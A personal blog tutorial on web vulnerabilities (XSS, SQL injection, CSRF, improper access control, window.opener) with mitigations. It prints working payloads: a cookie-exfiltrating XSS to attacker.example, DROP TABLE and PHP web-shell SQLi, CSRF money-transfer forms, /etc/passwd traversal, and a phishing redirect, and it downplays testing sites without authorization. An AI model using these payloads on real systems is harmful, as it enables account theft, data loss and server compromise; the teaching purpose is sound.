Aaron's Blog

The Basics of Web Security

This was written to help some friends of mine who are becoming interested in cybersecurity to be able to learn. It explains web vulnerabilities including XSS, CSRF, SQLi, IAC, and window.opener.

I may add some more in later to explain other vulnerabilities such as XSHM, session fixation, header injection, and missing security headers, but for now, this seems like a good start.

I would recommend learning about the following before reading this decent-sized blog post:

And here are some terms that you will read in this post. These are all pretty simple terms so you may already know them, but just in case:

One last thing-- the legalities. You are obliged by law to act responsibly when testing websites for vulnerabilities. It is strictly illegal to test any website that you do not own or do not have authorization to test (Computer Fraud and Abuse Act - 18 U.S.C. § 1030). By saying this I am not condoning breaking the law, but the truth is that the vast majority of websites will not take legal action just because someone was testing their website, unless that someone actually exploited something they found maliciously. When reporting vulnerabilities to websites that were tested without authorization, you may be frowned upon. But the truth of the matter is that most people are actually happy that you responsibly disclosed the vulnerability to them without maliciously exploiting it (because by doing so, you are potentially saving them hundreds, thousands, or even millions of dollars-- it could have been maliciously exploited by a blackhat).

There's something called a "bug bounty" that many websites and services have. Basically, they allow you to submit vulnerabilities via responsible disclosure, and you get paid hundreds or thousands for them (and get awarded swag occasionally!). Larger companies like Google, GitHub, Instagram, Snapchat, Uber, and more usually have bug bounties. It is completely legal to test their websites because they authorize you to. You can Google for "[company] bug bounty" to see if a site you are testing has a bug bounty.

Anyways, here are some important vulnerabilities to know about...

Cross-Site Scripting (XSS)

Cross-Site Scripting (also known as XSS) is a vulnerability in which an attacker is able to inject client-side code (such as HTML or JavaScript) into a webpage viewed by others. This happens because the webpage does not sanitize the user's input before writing it to the page, allowing attackers to:

A typical payload for testing for XSS is:

<script>alert(1)</script>

If the webpage does not sanitize the payload, the alert(1) causes the webpage to open a dialog with the contents 1, which is easily noticed by the tester.


Stored XSS

Stored XSS (also known as Persistent XSS) occurs when an attacker makes the server save the payload to a database or file.

For example, Alice could post a new status update on a social media site or set her profile description to Enjoying watching a movie right now <script>alert(1)</script>. If the webpage is vulnerable, the payload will trigger an alert dialog to open whenever Bob or anyone visits the page. The attacker (Alice) could potentially use a payload that sends the victim's session token to their website, allowing the attacker to pwn the victim's account.

This type tends to be more dangerous, because many users will visit the page containing the payload in the course of normal browsing, without having to click a link. It requires minimal to no user interaction.
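As a sketch of why stored XSS is so dangerous, here is how a session-stealing payload like the one described above could be built. The attacker domain is hypothetical; when the payload executes in a victim's browser, the fake "image" request carries the victim's cookies to the attacker's server.

```javascript
// Hypothetical attacker-controlled endpoint that logs incoming requests.
const sink = "https://attacker.example/steal?c=";

// The stored payload: creating an Image sends a GET request to its src,
// which here includes the victim's cookies. The closing tag is split so
// this string can itself be embedded in a <script> block without ending it.
const payload =
  "<script>new Image().src='" + sink + "'+" +
  "encodeURIComponent(document.cookie)</scr" + "ipt>";

console.log(payload);
```

If a profile description containing this string is written to the page unsanitized, every visitor's cookies are sent to the attacker.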

Reflected XSS

Reflected XSS (also known as Non-Persistent XSS) occurs when a webpage parses the user's input and displays a webpage of results without sanitizing the output.

If Alice searched for <script>alert(1)</script> on some search engine and a page of results came up, the title could be something like Search results for "<script>alert(1)</script>". Since the title wasn't sanitized, the payload would be executed. If the payload could be put in the URL like http://searchengine.com/search/?query=<script>alert(1)</script>, then the attacker could simply send the URL to a victim, or make an iframe on their site that loads the page that executes the payload.

Because this type requires the user to either visit the attacker's website or click on a URL, this type isn't as catastrophic as Stored XSS.

Self XSS

Self XSS is technically not a vulnerability, but it can have the same consequences as other types of XSS if properly done. It relies on social engineering to be performed.

For example, if an attacker sent Alice an XSS payload like <script>alert(1)</script> and told her to paste it into a search box and press enter (and she did), and the webpage is vulnerable, it could execute the JavaScript, with the same consequences as Reflected XSS.

From a technical standpoint, this is not a vulnerability. It usually requires an excessive amount of user interaction to be performed, so it is of low severity.


If the vulnerable webpage does not sanitize the user input, <script>alert(1)</script> is sometimes enough.

However, vulnerable webpages often write the user input inside of an HTML attribute, like <div id="$input"> (where $input is the user's input). This can still be easily exploited using a payload like "><script>alert(1)</script>. To test, attackers generally use something like '>"><script>alert(1)</script>, because it will close either the " or the ' so that the payload can be executed.
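To see why the "> prefix matters, here is a sketch of a server template (the function is hypothetical) that interpolates user input into an attribute without encoding, and what the payload turns it into:

```javascript
// Hypothetical vulnerable template: user input lands inside an attribute.
function renderProfile(input) {
  return '<div id="' + input + '">profile</div>';
}

// Benign input stays safely inside the attribute value.
console.log(renderProfile("alice"));
// → <div id="alice">profile</div>

// The payload's "> closes the attribute and the <div> tag,
// so the injected <script> lands in plain HTML context and executes.
console.log(renderProfile('"><script>alert(1)</script>'));
// → <div id=""><script>alert(1)</script>">profile</div>
```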

Another common vulnerability is when it writes into inline JavaScript, like <script>console.log('$input')</script> (where $input is the user's input). This can also easily be exploited using a payload similar to ');</script><script>alert(1)</script>'.

Even if the webpage does sanitize the characters " and ', when user input is written into <a href="$input"></a> tags, an attacker can also submit javascript:alert(1) as the URL and click the resulting link.

The smallest payload possible that opens an alert dialog is <svg/onload=alert(1)>. The / in that payload can also be a space character, but I usually use /, because some websites that I test do not allow the space character. The actual smallest payload possible for testing is <. If the page sanitizes it, viewing the source will show the encoded entity (&#x3C;) instead of the raw character; if the raw < appears, the input is not being sanitized. Testing isn't as fast though, because you have to manually check whether the character was sanitized instead of just waiting for an alert dialog to open.

Every now and then, a website that is being tested will convert the string being written to the page to uppercase. HTML is case-insensitive, but JavaScript isn't. Thus, to execute JavaScript, you can encode your JS with a tool called JSFuck located at https://goo.gl/L11vBB. JSFuck encodes JavaScript payloads to use only six different characters: ![]+(). Those characters are the same when uppercased or lowercased, so the JS will still work regardless of the case.

There are some methods for XSS that aren't usually thought of, like XSS via a lang cookie. The site developers might not consider lang to be user input because the user doesn't directly type data into the cookie, but it should be treated as user input all the same.

A less widely-known method of exploiting this vulnerability is via an SVG (Scalable Vector Graphics) image. Such files can execute JavaScript when rendered, if a script tag is declared:

<svg version="1.1" id="loader-1" x="0px" y="0px"
    width="40px" height="40px" viewBox="0 0 50 50" style="enable-background:new 0 0 50 50;" xml:space="preserve">
    <script type="text/javascript">
        alert(1);
    </script>
</svg>

Filename XSS is also possible. On Unix-based operating systems, the filename '>"><svg onload=alert(1)>.png is valid. Thus, an attacker could upload a file to a website with an XSS payload in the name. If the filename is written anywhere on the page, it has the potential to be vulnerable to filename XSS.

I have a file stored on my computer named '>"><svg onload=alert(1)>.svg. The file is an SVG image that executes JavaScript if rendered or if the name is written anywhere on the page. It has served as a useful tool for penetration-testing websites.


To avoid being vulnerable, be sure to sanitize the user's input before writing it to any page. To do this, encode the string with HTML entities, or if the programming language being used has a built-in function for sanitizing strings, use that.

Filenames must be sanitized before being written to the page to protect against filename XSS.

The best option to prevent SVG XSS is to completely block all SVG files. However, converting SVG files automatically to JPG or PNG files is an alternative. A common misconception is that loading an SVG in an img tag instead of an svg tag will prevent the execution of JavaScript. That is not always the case, however. If a user right-clicks on an SVG image loaded in by the img tag, the SVG image will be loaded directly, and the XSS will execute.

A good rule of thumb is this: Whenever you write anything-- any variable, a string, a cookie, a header, or even the time, just stop and think. Is there any way that a user could ever change the value of what is being written to the page? If so, it must be sanitized.

PHP comes with two functions for this, htmlspecialchars($string) and htmlentities($string). The difference is that htmlspecialchars() encodes only the characters that are special in HTML, while htmlentities() encodes every character that has an HTML entity equivalent; for this purpose, most developers prefer htmlspecialchars($string).
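In languages without a built-in, the encoding itself is only a few lines. Here is a minimal JavaScript sketch of what htmlspecialchars() does (the function name is my own):

```javascript
// Encode the characters that have special meaning in HTML so that
// user input is rendered as text instead of being parsed as markup.
function escapeHtml(s) {
  return s
    .replace(/&/g, "&amp;")   // must be first, or later entities get double-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

console.log(escapeHtml("<script>alert(1)</script>"));
// → &lt;script&gt;alert(1)&lt;/script&gt;
```

Note the ordering: & is replaced first, otherwise the & in &lt; would itself be re-encoded.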

SQL Injection (SQLi)

SQL Injection (also known as SQLi) is a vulnerability of medium to critical severity (depending on the case) that allows an attacker to inject arbitrary SQL into a query. It occurs because user input is not correctly filtered and sanitized before being used in the query. This can allow the attacker to:

The typical payload for testing for SQL Injection is:

' OR '1'='1

If the website does not properly sanitize the payload before using it in the query, unexpected things can happen. If this were in a login query, the finished query could be something like SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'. Since 1 is always equal to 1, the condition evaluates as true, and the attacker would be able to log in to the user's account.


Unfiltered Escape Characters

This type of SQL Injection vulnerability occurs when the server-side application fails to filter escape characters such as ' or ".

For example, if the server-side application ran this query to log users in: SELECT * FROM users WHERE username='$input' AND password='$input', an attacker could simply set their username and password to ' OR '1'='1, making the finished query SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'. That query is always true, because 1 is always equal to 1. So, an attacker would be able to log in to an account without a correct username or password.
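The way naive string concatenation produces that always-true query can be sketched in a few lines (the table and column names come from the example above; the function name is my own):

```javascript
// A vulnerable query builder: user input is pasted straight into the SQL.
function buildLoginQuery(username, password) {
  return "SELECT * FROM users WHERE username='" + username +
         "' AND password='" + password + "'";
}

// The classic test payload, used as both username and password.
const payload = "' OR '1'='1";

console.log(buildLoginQuery(payload, payload));
// → SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'
```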

Or, if the query was SELECT * FROM people WHERE firstname='$input', an attacker could use a payload like '; DROP TABLE people;--, and the entire people table would be deleted. The finished query with that payload would be SELECT * FROM people WHERE firstname=''; DROP TABLE people;--'.

Another common payload for testing is ', because if the escape characters remain unfiltered, the SQL query syntax will be invalid, and the server will report an error.

Blind SQL Injection

Blind SQL Injection occurs when the server-side application does not filter user input before using it in a query, but the results of the query (and any errors) are not displayed to the attacker. Attackers cannot use this to dump a table to the page, and they can't see errors when the payloads don't work, so they must infer the outcome indirectly.

For example, if the URL http://booksearch.com/search/?query=Harry%20Potter was vulnerable, the attacker could enter a test payload into http://booksearch.com/search/?query=Harry%20Potter' OR '1'='1 and see if the book still came up. If the results still appear with the always-true payload, but an error page, a blank page, or an HTTP 500 response comes back for a syntax-breaking payload like ', then the website is probably vulnerable to Blind SQL Injection.


It is exploited in many different ways, depending on the vulnerable page and how the query is implemented. The typical payload for testing for SQL injection is ' OR '1'='1. To drop a table and erase the data in it, an attacker would use a payload similar to '; DROP TABLE tablename;--.

Depending on the circumstance, an attacker could actually execute any SQL command they wanted, so long as it was formatted like '; YOURCOMMANDHERE;--. So, using that payload format, an attacker could execute the SQL command UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3 INTO OUTFILE '/var/www/html/exec.php', and it would create a file called exec.php that can be used as a backdoor (simply make an HTTP GET request to the page /exec.php?cmd=[your command here]).


Most programming languages include support for sanitizing user input for SQL queries, like PHP's mysqli_real_escape_string($string) function. Better yet, most languages and database libraries provide prepared statements, which prevent SQL injection by sending the query and the data to the database separately.
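To illustrate the escaping half of that advice, here is a JavaScript sketch of the kind of escaping mysqli_real_escape_string() performs, plus a naive placeholder-binding helper. Both function names are my own, and a real database driver binds parameters server-side rather than by string substitution; this is only a sketch of the idea.

```javascript
// Escape the characters that can terminate or alter a SQL string literal.
function escapeSqlString(s) {
  return s.replace(/[\0\n\r\\'"\x1a]/g, (c) =>
    "\\" + ({ "\0": "0", "\n": "n", "\r": "r", "\x1a": "Z" }[c] || c));
}

// Substitute ? placeholders with escaped, quoted values.
function bind(query, params) {
  let i = 0;
  return query.replace(/\?/g, () => "'" + escapeSqlString(String(params[i++])) + "'");
}

// The injection payload's quotes are escaped, so it stays inside the
// string literal instead of breaking out into the query.
console.log(bind("SELECT * FROM users WHERE username=? AND password=?",
                 ["' OR '1'='1", "x"]));
```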

Always assume that every one of your users is trying to hack you. Assume all user input is evil, and that if you use it in an SQL query, they will try to manipulate it in any and every way possible to try to break your server.

Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (also known as CSRF or XSRF) is a vulnerability that, when properly exploited, allows an attacker to evade cross-site request restrictions like the same-origin policy (a browser policy that prevents JavaScript on one domain from accessing or making HTTP requests to another domain). It is typically low to medium severity, but in some cases, it can be of critical severity (if a server control panel was vulnerable, for example). With this vulnerability, an attacker could:

In layman's terms, CSRF is a vulnerability that allows an attacker to force a victim to send an HTTP request to the vulnerable website without their consent or knowledge, with the intent to perform an action as the victim.

For example, if a social media website has no CSRF protection, an attacker could make an iframe that performs an HTTP request to the website to make a new post on the victim's account.



Suppose there was a bank website with an API endpoint to transfer money to someone else's account, but with no CSRF protection. To transfer the money, one would simply have to perform the HTTP request:

GET https://bank.com/transfer.php?to=alice&amount=100

In this example, pretend Alice noticed that the transfer API endpoint was vulnerable to CSRF. So, Alice decided to put the following HTML code on her website:

<iframe src="https://bank.com/transfer.php?to=alice&amount=100"></iframe>

If Bob were to visit Alice's website, an iframe would load the transfer.php page (it would send the HTTP GET request), and he would end up sending $100 to Alice without his consent.

Alice could even send Bob an email with the following HTML code in its contents:

<img src="https://bank.com/transfer.php?to=alice&amount=100" width="0" height="0" border="0">

This would load an image with the size 0x0 when Bob opened the email. When the image is loaded, an HTTP GET request is sent to the URL. The image isn't valid so it wouldn't load, but that doesn't matter because the HTTP GET request has already been sent. Bob would end up sending $100 to Alice just by opening an email.


After Alice hacked Bob's account for money, the bank website realized that it was vulnerable to CSRF. So, the banking website naively decided to solve the problem by only allowing HTTP POST requests instead of HTTP GET. They thought POST would solve the problem, because iframes can't make POST requests on their own. Or can they?

POST https://bank.com/transfer.php


What the bank website did not know is that POST CSRF differs from GET CSRF only in how the request is triggered in the victim's browser. All the attacker has to do is make a form that submits into the iframe. So, Alice easily defeated the website's attempt to protect users against CSRF.

<iframe style="display:none" name="csrf-frame"></iframe>

<form method="POST" action="https://bank.com/transfer.php" id="csrf-form" target="csrf-frame" style="display:none">
    <input type="hidden" name="to" value="alice">
    <input type="hidden" name="amount" value="100">
    <input type="submit" value="submit">
</form>

<script>document.getElementById("csrf-form").submit();</script>


The JavaScript in the code submits the form. The form makes a POST request to the transfer page, but because we set target="csrf-frame", it does the POST request inside of the iframe. And so yet again, Bob unknowingly sends another $100 to Alice, without his consent.

CSRF with Other HTTP Methods

While CSRF with other HTTP request methods such as PUT and DELETE is usually not possible, it should never be relied upon and should not be considered secure. There are many factors that could cause such a CSRF vulnerability to be exploitable:

In short, do not trust that PUT and DELETE HTTP methods are safe from CSRF, because often enough, they are not.

Login and Logout CSRF

Login CSRF is a lesser-known type of CSRF vulnerability. It is merely a POST CSRF vulnerability that happens to be in a login form. While some would argue that forcing a victim to log in to the attacker's account is pointless, that is simply not the case. The exploitation plays out similar to this: the attacker logs the victim in to the attacker's account via CSRF. Unaware that they are in the attacker's account, the victim submits sensitive information to the website (a credit card number, for example), which gets stored in, say, the account settings. Later, the attacker logs in to their own account, checks the settings, and retrieves the credit card number (or any other information) the victim submitted. The attacker has now successfully exfiltrated the victim's sensitive information.

Logout CSRF is regarded by many bug bounty program administrators as one of the most annoying types of reports to receive. Not only do many people report logout CSRF, but it is also unimportant from a security standpoint. With a few exceptions, the vast majority of the time, all an attacker can do with logout CSRF is, well, annoy the victim by logging them out. However, this vulnerability can be chained with an open redirect vulnerability on logout in the following way: first, the attacker logs the victim out via CSRF. Using the open redirect on logout, they redirect the victim to a login form that the attacker controls. The victim enters their credentials to sign back in, but the credentials are sent to the attacker instead of the website. This is an edge case, and it is fairly rare to find a website with this kind of vulnerability for phishing users like this.

Chaining CSRF with XSS

A CSRF vulnerability can, in fact, often be chained with an XSS vulnerability. When it is possible, the severity of these vulnerabilities escalates quite quickly.

Reflected XSS can be triggered by creating an iframe to load the vulnerable page if it is not protected by a CSRF token. Using this attack vector, an attacker can force the victim to execute arbitrary JavaScript code on another domain just by having the victim visit their website.

An attacker can utilize a POST CSRF vulnerability when chained with a stored XSS vulnerability to force a user to, just by visiting the attacker's website, store arbitrary JavaScript code on the affected website.

Another method of chaining CSRF with XSS is to, via XSS, get the CSRF token, and make a CSRF request to the same domain using the exfiltrated token. One example of this is how Samy Kamkar's fast-spreading worm used XSS on MySpace to obtain the CSRF token and forge HTTP requests that made new posts containing the XSS payload.
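The token-theft step can be sketched as follows: JavaScript already running on the target origin (via XSS) fetches a page, pulls the CSRF token out of the form markup, and can then forge a valid request. The HTML below stands in for a fetched page, and the field name csrf_token is hypothetical.

```javascript
// Stand-in for the HTML an XSS payload would fetch from the same origin.
const fetchedPage = `
  <form action="/post" method="POST">
    <input type="hidden" name="csrf_token" value="d41d8cd98f00b204">
    <textarea name="body"></textarea>
  </form>`;

// Extract the token from the hidden input; a forged request that
// includes this token will pass the site's CSRF check.
const match = fetchedPage.match(/name="csrf_token" value="([^"]+)"/);
const token = match ? match[1] : null;

console.log(token);
// → d41d8cd98f00b204
```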



<iframe src="https://bank.com/transfer.php?to=alice&amount=100"></iframe>


<iframe style="display:none" name="csrf-frame"></iframe>

<form method="POST" action="https://vulnerablewebsite.com/" id="csrf-form" target="csrf-frame" style="display:none">
    <input type="hidden" name="parameter" value="content">
    <input type="submit" value="submit">
</form>

<script>document.getElementById("csrf-form").submit();</script>


Login CSRF: Simply use the HTTP POST code and modify it to log the victim in to the attacker's account.

Logout CSRF: Use the HTTP GET code to visit the URL that logs out the user.

Chaining CSRF with XSS: Configure the CSRF exploit code to either make a GET request or a POST request to the XSS-vulnerable page with the XSS payload in either the URL parameters or the body of the request.


To mitigate this vulnerability, create a unique CSRF token (a nonce), and store it in the cookies. Whenever a POST request is made (or a GET request, if applicable), verify that the URL parameters, the body of the request, or the HTTP headers sent with the request contain the same CSRF token as the one stored in the cookies. This means that to forge requests, the attacker must somehow predict the victim's CSRF token and use it in the HTTP request, which is nearly impossible.

In addition to the above solution, it is advised that the website validates the Origin or Referer header to ensure that the HTTP request came from the same domain. This doesn't always work, however: if the CSRF vulnerability is chained with an XSS vulnerability running on the same domain, it can still perform the CSRF requests. And if the website is vulnerable to DNS rebinding, this protection is useless.

Always be sure to protect login forms with CSRF tokens. Periodically regenerate CSRF tokens too, to prevent guessing.

Improper Access Control (IAC)

Improper Access Control (also known as IAC) is a vulnerability of medium to critical severity that occurs when a website does not properly restrict a resource from an attacker. The aforementioned resources can include password files, configuration files, logs, /etc/shadow and /etc/passwd on Unix-based operating systems, and any other potentially sensitive files. It also includes resources such as a page or website that is typically password protected. When an attack is carried out on an IAC-vulnerable website, the attacker may be able to:

Because this vulnerability is very broad, only a couple of types will be covered. The vulnerability itself is simple and easy to understand, but it differs from case to case, so it is difficult to demonstrate every way it can occur.

There is no typical payload for testing, as this attack is not injection-based like XSS and SQLi.


Improper File Access Control

An application is vulnerable to improper file access control if it allows an attacker to read or write to arbitrary files or folders.

Take below as an example:


Often, when URLs have a parameter named file or something similar, they are vulnerable to IAC. An attacker could insert a sensitive file into the URL parameter such as /etc/passwd and potentially be able to download it, if it doesn't verify that the requested file is "legal" to download ("legal" meaning "intended to be downloaded by the website").


An attacker could use this to download configuration files, logs, the website's source code, and so on. This type of vulnerability is typically of medium severity: while it does not directly enable remote code execution (also known as RCE), the files it exposes-- configuration files, logs, source code, or even private keys or SSH keys-- can lead to further compromise.

If the path to the downloaded file is just taken directly from the file parameter (an absolute path to the file), an attacker can just enter in /etc/passwd to download the passwd file. However, if the path to the downloaded file is relative (if the file parameter is appended to the current path), then an attacker must "go back" a few directories to get to the root directory before accessing /etc/passwd.

For example, if $file$ is replaced by the file parameter from the URL in the string /var/www/html/$file$, then to access /etc/passwd, an attacker must set file to ../../../etc/passwd so that the path generated is /var/www/html/../../../etc/passwd (that will lead to the file /etc/passwd).

This type of IAC can also be exploited to write to files or folders. If an attacker found an access control vulnerability in the website that allowed them to write to arbitrary files, they could potentially add an SSH key, add a user, or modify config files. If the vulnerable website allows writing to files or folders, the severity quickly escalates to critical, as it is on the same level as remote code execution, which can lead to total compromise of the server.

Improper Web Resource Access Control

This type of vulnerability occurs when a normal user can access, without special permissions or further authentication, a sensitive page, configuration, or logs that only an administrator should be able to access.

For example, if an administrator panel located at /panel/ is supposed to be accessible only to administrators or users with special privileges, but a normal user can access it without authentication just by visiting /panel/, then it is vulnerable.

This type of vulnerability is relatively self-explanatory and simple, and therefore does not need further description.


Improper file access control vulnerabilities are typically used to download sensitive files, and those files are then used to exploit the vulnerable website further. For example, an attacker could download a configuration file that contains credentials for an SQL server, download /etc/passwd, or potentially download SSH keys or private keys and use them to SSH into the server hosting the website.

It's typically a good idea to test download pages, and any page that references a parameter named something like file, with different payloads such as ../../../etc/passwd and /etc/passwd.

If a settings page, for example, references users by their username in the URL parameter, it is a good idea to try entering another user's username, and verify whether or not you are able to view/modify their settings.


Logical validation is typically performed in order to secure direct object references. Types of validation may include minimum and maximum bound checking, pattern matching (e.g. social security numbers, filenames), and acceptable-character checks (e.g. no / characters).
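A pattern check for a filename parameter might look like the sketch below. The pattern itself is an example of a conservative allowlist, not a universal rule: it permits only letters, digits, dots, underscores, and hyphens, and nothing that could form a path.

```javascript
// Allow only simple filenames: no slashes, no leading dot (so no ".." ),
// no shell metacharacters.
const SAFE_FILENAME = /^[A-Za-z0-9][A-Za-z0-9._-]*$/;

function isSafeFilename(name) {
  return SAFE_FILENAME.test(name);
}

console.log(isSafeFilename("report.pdf"));       // → true
console.log(isSafeFilename("../../etc/passwd")); // → false (leading dot, slashes)
console.log(isSafeFilename("/etc/passwd"));      // → false (absolute path)
```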

Whitelist validation is another method of mitigation that involves checking the referenced object against a list of allowed files or objects. If the list contains the object, access may continue; if it is not whitelisted, access is denied.

The last method of mitigation uses indirect object references. Basically, instead of directly using object names like filenames in URLs, the server uses "file ids" (integers that correspond to the filenames). Since the ids map only to files the site intends to serve, an attacker has no way to reference arbitrary files like /etc/passwd.
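An indirect-reference lookup can be sketched as a simple id-to-filename map (the ids and filenames below are hypothetical):

```javascript
// The URL carries only an integer id; the server maps it to a file.
const files = new Map([
  [1, "brochure.pdf"],
  [2, "pricing.pdf"],
]);

function fileForId(id) {
  // Unknown or non-numeric ids resolve to nothing, so arbitrary
  // paths like /etc/passwd can never be requested.
  return files.get(Number(id)) ?? null;
}

console.log(fileForId("2"));                // → pricing.pdf
console.log(fileForId("../../etc/passwd")); // → null
```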

In cases like a user settings page where an attacker could potentially insert another user's name into a URL and edit their settings, authentication should be performed to ensure that the user modifying the settings has the correct permissions to do so.


The window.opener Vulnerability

There is a lesser-known vulnerability that most people just call "the window.opener vulnerability". When a webpage opens a new tab or window, if it is not properly protected, the webpage that is opened can write to the opener's window.location (even to a cross-origin site). Therefore, if properly exploited, once a user clicks on a link that opens a malicious website in a new tab, the new tab could write to window.opener.location, and while the victim's attention is focused on the new page that opened, they won't notice the tab that opened the malicious website being redirected to a phishing website.

While some may argue that this is social engineering and not a vulnerability, that is simply not the case; window.opener is a vulnerability, one that enables social engineering.


The below script first checks if window.opener is set, and if it is, it sets window.opener.location to the location of an example malicious website.

    if (window.opener) {
        window.opener.location = 'https://maliciouswebsite.com/fakepage.php';
    }

To test for this vulnerability, wherever users can enter arbitrary links or URLs, try entering my website https://arinerron.com. I have a script on my website that will check for window.opener, and if it is set, it redirects the opened page to https://arinerron.com/hacked.


To mitigate this vulnerability, whenever a URL is opened in a new tab, sever the window.opener reference by adding rel="noopener noreferrer" to <a> elements (noopener nulls window.opener in the opened page, and noreferrer additionally suppresses the referrer). While this vulnerability is not severe, it's probably worth fixing, in order to add an extra layer of protection for users.

Welp, that's it!

There are a lot more types of vulnerabilities out there; I've only scratched the surface in this post. If this post got you interested in web security, I'd recommend checking out this enormous list of vulnerabilities that are still left to learn about. Also, if you want to try testing for XSS vulnerabilities legally, check out Google's XSS Game. Good luck! :)

Written by Aaron E. (aka: Arinerron) - September 2, 2017